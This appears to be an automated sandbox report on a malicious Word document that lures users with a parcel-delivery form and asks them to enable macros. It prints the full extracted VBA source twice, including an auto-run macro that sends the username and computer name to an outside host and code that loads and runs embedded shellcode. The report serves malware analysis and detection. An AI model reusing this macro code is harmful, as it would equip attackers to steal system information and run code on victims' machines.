Office (OLE) malware analysis — malicious · 1d51e1dca0bcf31f

MALICIOUS

Office (OLE)

79.5 KB Created: 2016-03-03 15:26:00 Authoring application: Microsoft Office Word First seen: 2016-05-16

MD5: 750c1f4f4b69afcc335fbd8269833c3d SHA-1: 7df186bf393062ac0d7784c563c94ecd7b0d3c95 SHA-256: 1d51e1dca0bcf31f4c784d7c88be26dc2add4d57212cdac9809e7c2273727698

158 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, including a Document_Open macro that uses CreateObject and VirtualAlloc, indicating it's designed to execute code. The document body presents a lure for parcel delivery, instructing the user to enable macros. The VBA script likely downloads and executes a second-stage payload, as suggested by the use of VirtualAlloc and the presence of an unknown URL.

Heuristics 8

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set h = CreateObject("MSXML2.ServerXMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False

Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://launchpad.fintechexchange.net/index.php?uid= In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5511 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5511 bytes
SHA-256: `109b5462e0689a5fdfb5a3639d59e0b89a7392b28bee5fb5074cc86f68120854`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function ctt Lib "kernel32" Alias "CreateThread" (ByVal Tkkjijxfc As Long, ByVal Fnee As Long, ByVal Rpejhpk As Long, Ssw As Long, ByVal Nxlm As Long, Epcsadilr As Long) As Long Private Declare Function alActiveDocument Lib "kernel32" Alias "VirtualAlloc" (ByVal Dcozrgid As Long, ByVal Alu As Long, ByVal Euntyu As Long, ByVal Ebknpxo As Long) As Long Private Declare Function rtmCloseDocument Lib "kernel32" Alias "RtlMoveMemory" (ByVal Lignezo As Long, ByRef Kvaopnm As Any, ByVal Bpqxrri As Long) As Long Function extractit() As String Dim o As Object For i = 1 To ThisDocument.BuiltInDocumentProperties.Count Set o = ThisDocument.BuiltInDocumentProperties(i) If o.Name = "Author" Then extractit = CStr(o.Value) End If Next i End Function Sub doit() Dim Jkdduwwo As Long, Ajbfqmiu As Variant, Yfs As Long Dim Fvidm As Long, Yzpfobi As Long Ajbfqmiu = Array(&H89, &HE5, &H83, &HEC, &H10, &H64, &H8B, &H1D, &H30, &H0, &H0, &H0, &H8B, &H5B, &HC, &H8B, &H5B, &H14, &H8B, &H1B, &H8B, &H1B, &H8B, &H5B, &H10, &H89, &H5D, &HF4, &H68, &H8E, &H4E, &HE, &HEC, &H53, &HE8, &H7, &H1, &H0, &H0, &H89, &H45, _ &HFC, &H83, &HC4, &H8, &H68, &HAA, &HFC, &HD, &H7C, &H53, &HE8, &HF6, &H0, &H0, &H0, &H89, &H45, &HF8, &H83, &HC4, &H8, &H31, &HD2, &HEB, &H1D, &H59, &H88, &H51, &H6E, &HE8, &H31, &H1, &H0, &H0, &H88, &H51, &HA, &H88, &H51, &H1D, &H88, _ &H51, &H27, &H88, &H51, &H2F, &H88, &H51, &H3A, &H89, &H4D, &HF0, &HEB, &H74, &HE8, &HDE, &HFF, &HFF, &HFF, &H74, &H71, &H6B, &H6C, &H6E, &H6D, &H2D, &H63, &H6B, &H6B, &H4E, &H54, &H51, &H4B, &H43, &H6E, &H76, &H6D, &H6B, &H6E, &H60, &H63, &H53, _ &H6E, &H45, &H68, &H6B, &H64, &H40, &H4E, &H65, &H6B, &H60, &H72, &H67, &H2D, &H64, &H77, &H64, &H4E, &H56, &H68, &H6D, &H44, &H77, &H64, &H62, &H4E, &H44, &H77, &H68, &H73, &H53, &H67, &H71, &H64, &H60, &H63, &H4E, &H4E, &H67, &H73, &H73, &H6F, _ &H72, &H39, &H2E, &H2E, &H6B, &H60, &H74, &H6D, &H62, &H67, &H6F, &H60, &H63, &H2D, &H65, &H68, &H6D, &H73, &H64, &H62, &H67, &H64, &H77, &H62, &H67, &H60, &H6D, &H66, &H64, &H2D, &H6D, &H64, &H73, &H2E, &H65, &H6B, &H60, &H72, &H67, &H5E, &H72, _ &H6B, &H2D, &H64, &H77, &H64, &H4E, &H51, &H8B, &H5D, &HFC, &HFF, &HD3, &H8B, &H5D, &HFC, &H8B, &H4D, &HF0, &H83, &HC1, &HB, &H51, &H50, &H8B, &H5D, &HF8, &HFF, &HD3, &H31, &HD2, &H52, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &H83, &HC1, _ &H1E, &H51, &H52, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, &HC1, &H28, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H31, &HD2, &H66, &H83, &HCA, &H5, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, _ &HC1, &H30, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H52, &HFF, &HD0, &H60, &H8B, &H6C, &H24, &H24, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H34, &H49, &H8B, _ &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H28, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, _ &H8B, &H4, &H8B, &H1, &HE8, &H89, &H44, &H24, &H1C, &H61, &HC3, &H89, &HCE, &H31, &HDB, &H8B, &H1E, &H84, &HDB, &H74, &H8, &H83, &HC3, &H1, &H89, &H1E, &H46, &HEB, &HF2, &HC3) Fvidm = alActiveDocument(0, UBound(Ajbfqmiu), &H1000, &H40) For Yfs = LBound(Ajbfqmiu) To UBound(Ajbfqmiu) Jkdduwwo = Ajbfqmiu(Yfs) Yzpfobi = rtmCloseDocument(Fvidm + Yfs, Jkdduwwo, 1) Next Yfs Yzpfobi = ctt(0, 0, Fvidm, 0, 0, 0) End Sub Private Sub CheckBox1_Click() End Sub Private Sub CommandButton1_Click() ' On Error GoTo Failed MsgBox "Thank you. Your form has been received by the central post master and will be processed shortly." 'doit ThisDocument.Close False GoTo Quit Failed: MsgBox "There was a problem submitting your form. Please try again later." Quit: End Sub Private Sub Document_Open() Dim uid As String On Error GoTo inprotected ThisDocument.Shapes(1).Delete On Error Resume Next uid = extractit() Dim h As Object Set h = CreateObject("MSXML2.ServerXMLHTTP") h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False h.Send "" ChDrive "C" ChDir Environ("AppData") doit Exit Sub inprotected: ThisDocument.SaveAs2 Environ("AppData") & "\\PostRedirect.doc", wdFormatDocument 'ThisDocument.Close False DoEvents Documents.Open Environ("AppData") & "\\PostRedirect.doc", False, False ActiveWindow.View.ReadingLayout = False DoEvents ThisDocument.Shapes(1).Delete 'ThisDocument.Shapes(2).Delete End Sub Sub Dosomestuff() ThisDocument.Shapes(1).Delete 'ThisDocument.Shapes(2).Delete ThisDocument.AcceptAllRevisionsShown End Sub

SHA-256: 109b5462e0689a5fdfb5a3639d59e0b89a7392b28bee5fb5074cc86f68120854

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

    Private Declare Function ctt Lib "kernel32" Alias "CreateThread" (ByVal Tkkjijxfc As Long, ByVal Fnee As Long, ByVal Rpejhpk As Long, Ssw As Long, ByVal Nxlm As Long, Epcsadilr As Long) As Long
    Private Declare Function alActiveDocument Lib "kernel32" Alias "VirtualAlloc" (ByVal Dcozrgid As Long, ByVal Alu As Long, ByVal Euntyu As Long, ByVal Ebknpxo As Long) As Long
    Private Declare Function rtmCloseDocument Lib "kernel32" Alias "RtlMoveMemory" (ByVal Lignezo As Long, ByRef Kvaopnm As Any, ByVal Bpqxrri As Long) As Long
Function extractit() As String
    Dim o As Object
    For i = 1 To ThisDocument.BuiltInDocumentProperties.Count
        Set o = ThisDocument.BuiltInDocumentProperties(i)
        If o.Name = "Author" Then
            extractit = CStr(o.Value)
        End If
    Next i
End Function

Sub doit()
    Dim Jkdduwwo As Long, Ajbfqmiu As Variant, Yfs As Long
    Dim Fvidm As Long, Yzpfobi As Long

    Ajbfqmiu = Array(&H89, &HE5, &H83, &HEC, &H10, &H64, &H8B, &H1D, &H30, &H0, &H0, &H0, &H8B, &H5B, &HC, &H8B, &H5B, &H14, &H8B, &H1B, &H8B, &H1B, &H8B, &H5B, &H10, &H89, &H5D, &HF4, &H68, &H8E, &H4E, &HE, &HEC, &H53, &HE8, &H7, &H1, &H0, &H0, &H89, &H45, _
                        &HFC, &H83, &HC4, &H8, &H68, &HAA, &HFC, &HD, &H7C, &H53, &HE8, &HF6, &H0, &H0, &H0, &H89, &H45, &HF8, &H83, &HC4, &H8, &H31, &HD2, &HEB, &H1D, &H59, &H88, &H51, &H6E, &HE8, &H31, &H1, &H0, &H0, &H88, &H51, &HA, &H88, &H51, &H1D, &H88, _
                        &H51, &H27, &H88, &H51, &H2F, &H88, &H51, &H3A, &H89, &H4D, &HF0, &HEB, &H74, &HE8, &HDE, &HFF, &HFF, &HFF, &H74, &H71, &H6B, &H6C, &H6E, &H6D, &H2D, &H63, &H6B, &H6B, &H4E, &H54, &H51, &H4B, &H43, &H6E, &H76, &H6D, &H6B, &H6E, &H60, &H63, &H53, _
                        &H6E, &H45, &H68, &H6B, &H64, &H40, &H4E, &H65, &H6B, &H60, &H72, &H67, &H2D, &H64, &H77, &H64, &H4E, &H56, &H68, &H6D, &H44, &H77, &H64, &H62, &H4E, &H44, &H77, &H68, &H73, &H53, &H67, &H71, &H64, &H60, &H63, &H4E, &H4E, &H67, &H73, &H73, &H6F, _
                        &H72, &H39, &H2E, &H2E, &H6B, &H60, &H74, &H6D, &H62, &H67, &H6F, &H60, &H63, &H2D, &H65, &H68, &H6D, &H73, &H64, &H62, &H67, &H64, &H77, &H62, &H67, &H60, &H6D, &H66, &H64, &H2D, &H6D, &H64, &H73, &H2E, &H65, &H6B, &H60, &H72, &H67, &H5E, &H72, _
                        &H6B, &H2D, &H64, &H77, &H64, &H4E, &H51, &H8B, &H5D, &HFC, &HFF, &HD3, &H8B, &H5D, &HFC, &H8B, &H4D, &HF0, &H83, &HC1, &HB, &H51, &H50, &H8B, &H5D, &HF8, &HFF, &HD3, &H31, &HD2, &H52, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &H83, &HC1, _
                        &H1E, &H51, &H52, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, &HC1, &H28, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H31, &HD2, &H66, &H83, &HCA, &H5, &H52, &H8B, &H4D, &HF0, &H83, &HC1, &H1E, &H51, &HFF, &HD0, &H8B, &H4D, &HF0, &H83, _
                        &HC1, &H30, &H51, &H8B, &H45, &HF4, &H50, &H8B, &H45, &HF8, &HFF, &HD0, &H52, &HFF, &HD0, &H60, &H8B, &H6C, &H24, &H24, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H34, &H49, &H8B, _
                        &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H28, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, _
                        &H8B, &H4, &H8B, &H1, &HE8, &H89, &H44, &H24, &H1C, &H61, &HC3, &H89, &HCE, &H31, &HDB, &H8B, &H1E, &H84, &HDB, &H74, &H8, &H83, &HC3, &H1, &H89, &H1E, &H46, &HEB, &HF2, &HC3)
    Fvidm = alActiveDocument(0, UBound(Ajbfqmiu), &H1000, &H40)
    For Yfs = LBound(Ajbfqmiu) To UBound(Ajbfqmiu)
        Jkdduwwo = Ajbfqmiu(Yfs)
        Yzpfobi = rtmCloseDocument(Fvidm + Yfs, Jkdduwwo, 1)
    Next Yfs
    Yzpfobi = ctt(0, 0, Fvidm, 0, 0, 0)
End Sub

Private Sub CheckBox1_Click()

End Sub

Private Sub CommandButton1_Click()
  '  On Error GoTo Failed
    MsgBox "Thank you. Your form has been received by the central post master and will be processed shortly."
    'doit
    ThisDocument.Close False
    GoTo Quit
Failed:
    MsgBox "There was a problem submitting your form. Please try again later."
Quit:
End Sub

Private Sub Document_Open()
    Dim uid As String
    On Error GoTo inprotected
    ThisDocument.Shapes(1).Delete
    
    On Error Resume Next
    uid = extractit()
    Dim h As Object
    Set h = CreateObject("MSXML2.ServerXMLHTTP")
    h.Open "GET", "https://launchpad.fintechexchange.net/index.php?uid=" & uid & "&un=" & Environ("USERNAME") & "&cn=" & Environ("COMPUTERNAME"), False
    h.Send ""
    
    ChDrive "C"
    ChDir Environ("AppData")
    doit
    Exit Sub
inprotected:
    ThisDocument.SaveAs2 Environ("AppData") & "\\PostRedirect.doc", wdFormatDocument
    'ThisDocument.Close False
    DoEvents
    Documents.Open Environ("AppData") & "\\PostRedirect.doc", False, False
    ActiveWindow.View.ReadingLayout = False
    DoEvents
    ThisDocument.Shapes(1).Delete
    'ThisDocument.Shapes(2).Delete
End Sub

Sub Dosomestuff()
    ThisDocument.Shapes(1).Delete
    'ThisDocument.Shapes(2).Delete
    ThisDocument.AcceptAllRevisionsShown
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.